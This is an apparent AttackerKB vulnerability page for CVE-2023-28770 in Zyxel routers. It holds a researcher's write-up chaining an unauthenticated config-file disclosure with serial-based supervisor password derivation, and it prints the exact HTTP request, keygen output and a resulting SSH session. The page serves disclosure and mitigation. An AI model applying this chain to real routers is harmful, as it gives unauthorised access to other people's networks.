Very High
CVE-2023-28770
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2023-28770
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
The sensitive information exposure vulnerability in the CGI “Export_Log” and the binary “zcmd” in Zyxel DX5401-B0 firmware versions prior to V5.17(ABYO.1)C0 could allow a remote unauthenticated attacker to read the system files and to retrieve the password of the supervisor from the encrypted file.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
In December 2022, SEC Consult
released a blog with the title The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users . The blog explains an unauthenticated buffer overflow in more then 40 different Zyxel router models and the fast amount of thousands of routers that are vulnerable and accessible via the Internet.
The impact is still quite limited because the published Metasploit exploit module only works from the LAN side.
However, the Unauthenticated Buffer Overflow is not the only vulnerability on these routers and SEC Consult
discovered another 7 vulnerabilities that are described in their security analysis Multiple Critical Vulnerabilities in multiple Zyxel devices.
While reading the security analysis and reviewing the other vulnerabilities, I discovered a new opportunity to build an exploit by chaining two other vulnerabilities that will allow an unauthenticated attacker to get privileged access to the Zyxel router from either the WAN or LAN side. The potential of this exploit to attack from the WAN side makes it quite dangerous taking into account the large number of non-patched Zyxel routers out there on the Internet.
Recently, CVE-2023-28770 has been released covering the LFI vulnerability that is used in this chained exploit.
Zyxel router chained RCE
Exploiting an unauthenticated local file disclosure (LFI) vulnerability and a weak password derivation algorithm
The first vulnerability that stood out to me is the LFI vulnerability that is discussed in section 2 of the Security Analysis by SEC Consult.
The LFI vulnerability is present in the zhttp
binary that allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json
.
The burp request below shows a redacted response of the information that is disclosed such as encrypted passwords, account information, information on services configuration (FTP, Telnet, SSH), and hardware details such as serial number, hardware model etc. In total around 4000 lines of nested JSON
information that you would not like to share with anyone out there.
LFI Burp request and response
GET /Export_Log?/data/zcfg_config.json HTTP/1.1 Host: zyxel-vuln-router:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Connection: close
Response (REDACTED)
HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 148678 Date: Fri, 14 Apr 2023 08:47:46 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' ---- Hardware Information ---- { "Manufacturer":"ZYXEL", "ManufacturerOUI":"XXXXX", "ModelName":"VMG3625-T20A", "Description":"Wireless AC VDSL2 4-port Gateway with USB", "ProductClass":"VMG3625-T20A", "SerialNumber":"S000Y00000000", "SoftwareVersion":"V5.30(ABOU.2)b1_I0_20180821", "AdditionalHardwareVersion":"", "AdditionalSoftwareVersion":"", "UpTime":607055, "FirstUseDate":"2023-03-21T09:07:41", "VendorConfigFileNumberOfEntries":0, "SupportedDataModelNumberOfEntries":0, "ProcessorNumberOfEntries":0, "VendorLogFileNumberOfEntries":0, "LocationNumberOfEntries":0, "FixManufacturerOUI":"" }, ---- Account Information---- "X_ZYXEL_LoginCfg":{ "LoginGroupConfigurable":true, "LogGp":[ { "GP_Privilege":"_encrypt_XXXXXXXXXXXXXX", "Account":[ { "AutoShowQuickStart":false, "Enabled":true, "EnableQuickStart":true, "Page":"", "Username":"root", "Password":"", "PasswordHash":"", "Privilege":"_encrypt_XXXXXXXXXXXXX", "GetConfigByFtp":true, "DefaultPassword":"_encrypt_XXXXXXXXXXXXXX", "DefaultGuiPassword":"", "ResetDefaultPassword":false, "shadow":"root:$6$XXXXXXXXXXX:0::::::\n", "smbpasswd":"root:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U ]:LCT-0000004E:\n", "ConfigAccountFromWAN":false, "DefPwLength":8, "AccountCreateTime":0, "AccountRetryTime":3, "AccountIdleTime":300, "AccountLockTime":300, "RemoHostAddress":"", "DotChangeDefPwd":false, "ShowSkipBtnInChgDefPwdPage":false, "AutoGenPwdBySn":false, "RemoteAccessPrivilege":"LAN", "OldDefaultPassword":"", "CardOrder":"", "ThemeColor":"", "HiddenPage":"" }, { "AutoShowQuickStart":false, "Enabled":true, "EnableQuickStart":true, "Page":"", "Username":"supervisor", "Password":"", "PasswordHash":"", "Privilege":"_encrypt_XXXXXXXXXXX", "DefaultPassword":"_encrypt_XXXXXXXXXXX", "DefaultGuiPassword":"", "ResetDefaultPassword":false, "shadow":"supervisor:$6$XXXXXXXXXX:0::::::\n", "smbpasswd":"supervisor:12:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U ]:LCT-0000004E:\n", "ConfigAccountFromWAN":false, "DefPwLength":8, "AccountCreateTime":0, "AccountRetryTime":3, "AccountIdleTime":300, "AccountLockTime":300, "RemoHostAddress":"", "DotChangeDefPwd":false, "ShowSkipBtnInChgDefPwdPage":false, "AutoGenPwdBySn":false, "RemoteAccessPrivilege":"LAN", "OldDefaultPassword":"", "CardOrder":"", "ThemeColor":"", "HiddenPage":"" } ], "Level":"high" }, ---- Service Information ---- "X_ZYXEL_RemoteManagement":{ "Service":[ { "Name":"HTTP", "Enable":true, "Protocol":6, "Port":8080, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":1, "LifeTime":20, "BoundInterfaceList":"" }, { "Name":"HTTPS", "Enable":true, "Protocol":6, "Port":443, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" }, { "Name":"FTP", "Enable":true, "Protocol":6, "Port":21, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" }, { "Name":"TELNET", "Enable":true, "Protocol":6, "Port":23, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" }, { "Name":"SSH", "Enable":true, "Protocol":6, "Port":22, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" },
Now this information disclosure in itself will not pose a direct threat to these routers, but of course attackers could try to crack the obtained encrypted shadow passwords, but this will take a long time.
So is there any other way to use the disclosed information for a successful attack?
And of course the answer is YES!
The second vulnerability that comes into play is the vulnerability described in section 3 of the analysis, “Unsafe Storage of Sensitive Data”.
It explains the password derivation technique used to decrypt the _encrypted_XXXXXX
passwords in the JSON
configuration file using a static AES Key and IV
.
But my attention was more drawn to another analysis Getting root on a Zyxel VMG8825-T50 router done by Thomas Rinsma
in 2020 that was referenced at the bottom of the section and where Thomas explains the password derivation techniques used on Zyxel routers.
In particular, section “Tangent 2: key and password derivation mechanisms” is quite interesting which describes in detail how the supervisor
user password can be derived using the serial key of the router.
So what if we use the LFI vulnerability to get the serial key of the router and try to crack the supervisor
password using this password derivation technique.
We can then use the disclosed router services information to check if ssh
or telnet
is enabled and accessible from the WAN and try to login as supervisor
to gain access to the router.
Bogi Napoleon Wennerstrøm
has reverse engineered and implemented some of these derivation functions producing the supervisor
password.
His repository can be found here on Github.
I tested his password derivation functions and indeed I can confirm that either zcfgBeCommonGenKeyBySerialNumMethod2
or zcfgBeCommonGenKeyBySerialNumMethod3
are working on vulnerable Zyxel routers.
# python ./main.py S000Y00000000 zcfgBeCommonGenKeyBySerialNum : A43338B488 zcfgBeCommonGenKeyBySerialNum_CBT : UdcTaX78 zcfgBeCommonGenKeyBySerialNumMethod2 : 2dc1a078 <== zcfgBeCommonGenKeyBySerialNumMethod3 : 58Pxnwdefr <== zcfgBeCommonGenKeyBySerialNumConfigLength(1) : EXXAY7XF zcfgBeCommonGenKeyBySerialNumConfigLength(2) : 4UxwvUxf zcfgBeCommonGenKeyBySerialNumConfigLength(3) : 4UxavUxf zcfgBeCommonGenKeyBySerialNumConfigLengthOld(1) : EXXAY7XF zcfgBeCommonGenKeyBySerialNumConfigLengthOld(2) : 4UxwvUxf zcfgBeCommonGenKeyBySerialNumConfigLengthOld(3) : 4UxavUxf ┌──(root💀cuckoo)-[~/zyxel_exploit/zyxel-vmg8825-keygen] └─# ssh supervisor@zyxel-vuln-router supervisor@zyxel-vuln-router's password: $ uname -a Linux VMG3625-T20A 2.6.36 #7 SMP Sat Aug 18 12:18:02 CET 2018 mips GNU/Linux $ id uid=12(supervisor) gid=12 groups=12 $
I have created a Metasploit
module that chains these two vulnerabilities together to gain access to vulnerable Zyxel routers.
PR submission to mainstream Metasploit
is completed and available.
Mitigation
Please follow this Security Advisory of Zyxel to patch your router.
As temporary measure, you should disable all your services on the router such as telnet
, ftp
and ssh
that allows access to the supervisor
user and configure your web interface only to be accessible by the admin
user.
References
CVE-2023-28770
The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users .
Multiple Critical Vulnerabilities in multiple Zyxel devices.
Getting root on a Zyxel VMG8825-T50 router
Zyxel VMG8825-T50 Supervisor Keygen – Github
Zyxel Security Advisory
Metasploit PR: Zyxel router chained RCE using LFI and weak password derivation algorithm
Credits
Credits goes to:
SEC Consult team
Thomas Rinsma
Bogi Napoleon Wennerstrøm
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- zyxel
Products
- dx5401-b0 firmware
References
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: